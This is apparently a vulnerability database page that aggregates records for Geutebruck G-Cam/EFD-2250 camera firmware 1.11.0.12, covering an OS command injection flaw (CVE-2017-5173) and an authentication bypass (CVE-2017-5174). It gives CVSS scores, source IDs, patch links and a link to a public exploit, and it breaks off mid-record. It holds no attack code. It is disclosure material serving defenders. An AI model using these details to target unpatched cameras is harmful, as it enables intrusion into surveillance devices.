
    27 vulnerabilities by geutebrueck

    VAR-201705-3255

    Vulnerability from variot - Updated: 2025-04-20 21:54

    An Improper Neutralization of Special Elements (in an OS command) issue, i.e. OS command injection, was discovered in Geutebruck IP Camera G-Cam/EFD-2250 Version 1.11.0.12. An improper neutralization of special elements vulnerability has been identified. If special elements are not properly neutralized, an attacker can call multiple parameters that can allow access to the root level operating system, which could allow remote code execution. The Geutebruck G-Cam/EFD-2250 provides a faster and safer solution for remote monitoring applications. A remote code execution vulnerability exists in Geutebruck G-Cam/EFD-2250. An attacker can exploit the vulnerability to execute arbitrary code. A failed attack can result in a denial of service. Attackers may exploit these issues to gain unauthorized access to the affected device and to execute arbitrary code within the context of the affected device. G-Cam/EFD-2250 1.11.0.12 is vulnerable; other versions may also be affected. Geutebruck IP Camera G-Cam/EFD-2250 is a network camera produced by the German company Geutebruck.


    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "g-cam/efd-2250",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "geutebruck",
            "version": "1.11.0.12"
          },
          {
            "_id": null,
            "model": "ip camera g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.11.0.12"
          },
          {
            "_id": null,
            "model": "g-cam/efd-2250",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "geutebrueck",
            "version": "1.11.0.12"
          },
          {
            "_id": null,
            "model": "ip camera g-cam efd-2250",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "geutebruck",
            "version": "1.11.0.12"
          },
          {
            "_id": null,
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "ip camera g cam efd 2250",
            "version": "1.11.0.12"
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "05ebd79b-f06d-41c7-986c-d7d4284611b4"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01889"
          },
          {
            "db": "BID",
            "id": "96209"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004263"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-611"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5173"
          }
        ]
      },
      "configurations": {
        "_id": null,
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam%2fefd-2250_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004263"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "Florent Montel, Frederic Cikala, and Davy Douhine of RandoriSec",
        "sources": [
          {
            "db": "BID",
            "id": "96209"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2017-5173",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2017-5173",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2017-01889",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "05ebd79b-f06d-41c7-986c-d7d4284611b4",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.2,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-113376",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2017-5173",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2017-5173",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2017-5173",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2017-5173",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2017-01889",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201702-611",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "IVD",
                "id": "05ebd79b-f06d-41c7-986c-d7d4284611b4",
                "trust": 0.2,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-113376",
                "trust": 0.1,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2017-5173",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "05ebd79b-f06d-41c7-986c-d7d4284611b4"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01889"
          },
          {
            "db": "VULHUB",
            "id": "VHN-113376"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5173"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004263"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-611"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5173"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "An Improper Neutralization of Special Elements (in an OS command) issue was discovered in Geutebruck IP Camera G-Cam/EFD-2250 Version 1.11.0.12. An improper neutralization of special elements vulnerability has been identified. If special elements are not properly neutralized, an attacker can call multiple parameters that can allow access to the root level operating system which could allow remote code execution. The Geutebruck G-Cam/EFD-2250 provides a faster and safer solution for remote monitoring applications. A remote code execution vulnerability exists in Geutebruck G-Cam/EFD-2250. An attacker exploited the vulnerability to execute arbitrary code. A failed attack can result in a denial of service. \nAttackers may exploit these issues to gain unauthorized access to the affected device and to  execute arbitrary code within the context of the affected device. \nG-Cam/EFD-2250 1.11.0.12 is vulnerable; other versions may also be affected. Geutebruck IP Camera G-Cam/EFD-2250 is a network camera produced by German Geutebruck company",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-5173"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004263"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01889"
          },
          {
            "db": "BID",
            "id": "96209"
          },
          {
            "db": "IVD",
            "id": "05ebd79b-f06d-41c7-986c-d7d4284611b4"
          },
          {
            "db": "VULHUB",
            "id": "VHN-113376"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5173"
          }
        ],
        "trust": 2.79
      },
      "exploit_availability": {
        "_id": null,
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-113376",
            "trust": 0.1,
            "type": "unknown"
          },
          {
            "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=41360",
            "trust": 0.1,
            "type": "exploit"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-113376"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5173"
          }
        ]
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2017-5173",
            "trust": 3.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-17-045-02",
            "trust": 2.9
          },
          {
            "db": "BID",
            "id": "96209",
            "trust": 2.7
          },
          {
            "db": "EXPLOIT-DB",
            "id": "41360",
            "trust": 1.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-611",
            "trust": 0.9
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01889",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004263",
            "trust": 0.8
          },
          {
            "db": "IVD",
            "id": "05EBD79B-F06D-41C7-986C-D7D4284611B4",
            "trust": 0.2
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "141142",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-113376",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5173",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "IVD",
            "id": "05ebd79b-f06d-41c7-986c-d7d4284611b4"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01889"
          },
          {
            "db": "VULHUB",
            "id": "VHN-113376"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5173"
          },
          {
            "db": "BID",
            "id": "96209"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004263"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-611"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5173"
          }
        ]
      },
      "id": "VAR-201705-3255",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "IVD",
            "id": "05ebd79b-f06d-41c7-986c-d7d4284611b4"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01889"
          },
          {
            "db": "VULHUB",
            "id": "VHN-113376"
          }
        ],
        "trust": 1.80833335
      },
      "iot_taxonomy": {
        "_id": null,
        "data": [
          {
            "category": [
              "IoT",
              "ICS"
            ],
            "sub_category": null,
            "trust": 0.6
          },
          {
            "category": [
              "ICS"
            ],
            "sub_category": null,
            "trust": 0.2
          },
          {
            "category": [
              "camera device"
            ],
            "sub_category": "IP camera",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "IVD",
            "id": "05ebd79b-f06d-41c7-986c-d7d4284611b4"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01889"
          }
        ]
      },
      "last_update_date": "2025-04-20T21:54:54.269000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.geutebrueck.com/en_EN.html"
          },
          {
            "title": "Patch for Geutebruck G-Cam/EFD-2250 Remote Code Execution Vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/89709"
          },
          {
            "title": "Geutebr\u00fcck G-Cam/EFD-2250 Security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=68204"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-01889"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004263"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-611"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-943",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004263"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5173"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 2.7,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-045-02"
          },
          {
            "trust": 2.4,
            "url": "http://www.securityfocus.com/bid/96209"
          },
          {
            "trust": 1.9,
            "url": "https://www.exploit-db.com/exploits/41360/"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-5173"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5173"
          },
          {
            "trust": 0.3,
            "url": "http://www.geutebrueck.com/en_en/product-overview-31934.html"
          },
          {
            "trust": 0.3,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-045-02 "
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/943.html"
          },
          {
            "trust": 0.1,
            "url": "https://tools.cisco.com/security/center/viewalert.x?alertid=52662"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01889"
          },
          {
            "db": "VULHUB",
            "id": "VHN-113376"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5173"
          },
          {
            "db": "BID",
            "id": "96209"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004263"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-611"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5173"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "OTHER",
            "id": null,
            "ident": null
          },
          {
            "db": "IVD",
            "id": "05ebd79b-f06d-41c7-986c-d7d4284611b4",
            "ident": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01889",
            "ident": null
          },
          {
            "db": "VULHUB",
            "id": "VHN-113376",
            "ident": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5173",
            "ident": null
          },
          {
            "db": "BID",
            "id": "96209",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004263",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-611",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5173",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2017-02-24T00:00:00",
            "db": "IVD",
            "id": "05ebd79b-f06d-41c7-986c-d7d4284611b4",
            "ident": null
          },
          {
            "date": "2017-02-24T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-01889",
            "ident": null
          },
          {
            "date": "2017-05-19T00:00:00",
            "db": "VULHUB",
            "id": "VHN-113376",
            "ident": null
          },
          {
            "date": "2017-05-19T00:00:00",
            "db": "VULMON",
            "id": "CVE-2017-5173",
            "ident": null
          },
          {
            "date": "2017-02-14T00:00:00",
            "db": "BID",
            "id": "96209",
            "ident": null
          },
          {
            "date": "2017-06-21T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-004263",
            "ident": null
          },
          {
            "date": "2017-02-20T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201702-611",
            "ident": null
          },
          {
            "date": "2017-05-19T03:29:00.183000",
            "db": "NVD",
            "id": "CVE-2017-5173",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2017-02-24T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-01889",
            "ident": null
          },
          {
            "date": "2017-09-01T00:00:00",
            "db": "VULHUB",
            "id": "VHN-113376",
            "ident": null
          },
          {
            "date": "2017-09-01T00:00:00",
            "db": "VULMON",
            "id": "CVE-2017-5173",
            "ident": null
          },
          {
            "date": "2017-03-07T04:02:00",
            "db": "BID",
            "id": "96209",
            "ident": null
          },
          {
            "date": "2017-06-21T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-004263",
            "ident": null
          },
          {
            "date": "2022-02-11T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201702-611",
            "ident": null
          },
          {
            "date": "2025-04-20T01:37:25.860000",
            "db": "NVD",
            "id": "CVE-2017-5173",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-611"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "_id": null,
        "data": "Geutebruck G-Cam/EFD-2250 Remote code execution vulnerability",
        "sources": [
          {
            "db": "IVD",
            "id": "05ebd79b-f06d-41c7-986c-d7d4284611b4"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01889"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "operating system command injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-611"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201705-3256

    Vulnerability from variot - Updated: 2025-04-20 20:41

    An Authentication Bypass issue was discovered in Geutebruck IP Camera G-Cam/EFD-2250 Version 1.11.0.12. An authentication bypass vulnerability has been identified. The existing file system architecture could allow attackers to bypass the access control, which may allow remote code execution. Geutebruck IP Camera G-Cam/EFD-2250 contains an access control vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). The Geutebruck G-Cam/EFD-2250 provides a faster and safer solution for remote monitoring applications. An attacker can exploit the vulnerability to gain unauthorized access to the affected device environment. Failed exploit attempts may result in a denial-of-service condition. G-Cam/EFD-2250 1.11.0.12 is vulnerable; other versions may also be affected. Geutebruck IP Camera G-Cam/EFD-2250 is a network camera made by the German company Geutebruck.


    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "ip camera g-cam efd-2250",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "geutebruck",
            "version": "1.11.0.12"
          },
          {
            "_id": null,
            "model": "g-cam/efd-2250",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "geutebruck",
            "version": "1.11.0.12"
          },
          {
            "_id": null,
            "model": "g-cam/efd-2250",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "geutebrueck",
            "version": "1.11.0.12"
          },
          {
            "_id": null,
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "ip camera g cam efd 2250",
            "version": "1.11.0.12"
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01888"
          },
          {
            "db": "BID",
            "id": "96209"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004264"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-610"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5174"
          }
        ]
      },
      "configurations": {
        "_id": null,
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam%2fefd-2250_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004264"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "Florent Montel, Frederic Cikala, and Davy Douhine of RandoriSec",
        "sources": [
          {
            "db": "BID",
            "id": "96209"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2017-5174",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2017-5174",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2017-01888",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.2,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-113377",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2017-5174",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2017-5174",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2017-5174",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2017-01888",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201702-610",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "IVD",
                "id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f",
                "trust": 0.2,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-113377",
                "trust": 0.1,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2017-5174",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01888"
          },
          {
            "db": "VULHUB",
            "id": "VHN-113377"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5174"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004264"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-610"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5174"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "An Authentication Bypass issue was discovered in Geutebruck IP Camera G-Cam/EFD-2250 Version 1.11.0.12. An authentication bypass vulnerability has been identified. The existing file system architecture could allow attackers to bypass access control, which may allow remote code execution. Geutebruck IP Camera G-Cam/EFD-2250 contains an access control vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). The Geutebruck G-Cam/EFD-2250 provides a faster and safer solution for remote monitoring applications. An attacker can exploit the vulnerability to gain unauthorized access to the affected device environment. Failed exploit attempts may result in a denial-of-service condition. \nG-Cam/EFD-2250 1.11.0.12 is vulnerable; other versions may also be affected. Geutebruck IP Camera G-Cam/EFD-2250 is a network camera from the German company Geutebruck.",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-5174"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004264"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01888"
          },
          {
            "db": "BID",
            "id": "96209"
          },
          {
            "db": "IVD",
            "id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f"
          },
          {
            "db": "VULHUB",
            "id": "VHN-113377"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5174"
          }
        ],
        "trust": 2.79
      },
      "exploit_availability": {
        "_id": null,
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-113377",
            "trust": 0.1,
            "type": "unknown"
          },
          {
            "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=41360",
            "trust": 0.1,
            "type": "exploit"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-113377"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5174"
          }
        ]
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2017-5174",
            "trust": 3.7
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-17-045-02",
            "trust": 2.9
          },
          {
            "db": "BID",
            "id": "96209",
            "trust": 2.7
          },
          {
            "db": "EXPLOIT-DB",
            "id": "41360",
            "trust": 1.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-610",
            "trust": 0.9
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01888",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004264",
            "trust": 0.8
          },
          {
            "db": "IVD",
            "id": "409C1FE8-A44C-4075-B30D-BC6E6046C75F",
            "trust": 0.2
          },
          {
            "db": "VULHUB",
            "id": "VHN-113377",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5174",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01888"
          },
          {
            "db": "VULHUB",
            "id": "VHN-113377"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5174"
          },
          {
            "db": "BID",
            "id": "96209"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004264"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-610"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5174"
          }
        ]
      },
      "id": "VAR-201705-3256",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "IVD",
            "id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01888"
          },
          {
            "db": "VULHUB",
            "id": "VHN-113377"
          }
        ],
        "trust": 1.7083333500000002
      },
      "iot_taxonomy": {
        "_id": null,
        "data": [
          {
            "category": [
              "IoT",
              "ICS"
            ],
            "sub_category": null,
            "trust": 0.6
          },
          {
            "category": [
              "ICS"
            ],
            "sub_category": null,
            "trust": 0.2
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01888"
          }
        ]
      },
      "last_update_date": "2025-04-20T20:41:54.247000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.geutebrueck.com/en_EN.html"
          },
          {
            "title": "Geutebruck G-Cam/EFD-2250 authentication bypass vulnerability patch",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/89708"
          },
          {
            "title": "Geutebr\u00fcck G-Cam/EFD-2250 Security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=68205"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-01888"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004264"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-610"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "NVD-CWE-noinfo",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-288",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-284",
            "trust": 0.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-113377"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004264"
          },
